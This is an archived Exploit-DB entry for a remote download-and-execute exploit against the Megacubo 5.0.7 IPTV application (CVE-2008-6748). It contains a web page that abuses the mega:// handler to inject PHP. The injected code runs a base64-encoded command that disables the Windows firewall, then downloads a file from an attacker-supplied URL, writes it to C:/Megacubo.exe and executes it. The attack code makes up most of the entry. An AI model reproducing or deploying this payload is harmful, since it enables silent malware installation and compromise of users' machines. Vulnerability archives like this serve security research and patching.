Megacubo 5.0.7 mega:// Remote File Download and Execute Exploit

ID EDB-ID:7630
Type exploitdb
Reporter JJunior
Modified 2009-01-01T00:00:00


Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit. CVE-2008-6748. Remote exploit for windows platform

                                            Megacubo 5.0.7 download & Execute
by :JJunior

tested against Internet Explorer 7 and Mozilla Firefox  1.5  Windows Xp sp 3

software site:
download url:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."
example exploit, download & Execute :

<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
// url download & exec code evil
evil = '';
// disable firewall  encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';
shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';
// shell code


# [2009-01-01]